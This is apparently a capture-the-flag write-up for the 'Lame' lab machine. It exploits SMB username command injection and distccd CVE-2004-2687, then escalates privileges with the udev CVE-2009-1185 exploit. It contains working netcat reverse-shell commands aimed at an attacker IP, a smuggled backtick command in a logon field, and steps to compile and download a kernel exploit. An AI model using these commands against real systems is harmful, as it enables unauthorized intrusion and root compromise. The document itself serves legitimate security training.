Lame

Authenticated SMB Reverse shell - Distccd v1 exploitation - Kernel 2.6 udev PrivEsc

Scanning

FTP Enumeration

Not vulnerable !

SMB Enumeration & Exploitation

WRITE access is enabled !

We can get a shell using this command - Only if we are an authenticated user !

logon "/=`nohup nc -nv 10.10.14.6 4444 -e /bin/sh`"

Alternative Method

Distcc v1 is vulnerable !

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.6 4444 -e /bin/bash'"

We can start a listener !

nc -nlvp 4444

Privilege Escalation

We’ll need to escalate privileges. Google the OS version — Linux 2.6.24 to see if it is vulnerable to any exploits. I tried CVE 2016–5195 and CVE 2008–0600, but they didn’t work.

Let’s try CVE 2009–1185

searchsploit -m 8572.c
gcc 8572.c -o 8572

python -m SimpleHTTPServer 9005
wget http://10.10.14.6:5555/8572

To run it

We need to do two things:

• Figure out the PID of the udevd netlink socket

• Create a run file in /tmp and add a reverse shell to it. Since any payload in that file will run as root, we’ll get a privileged reverse shell

ps aux | grep devd

Start the listener and run the exploit with the PID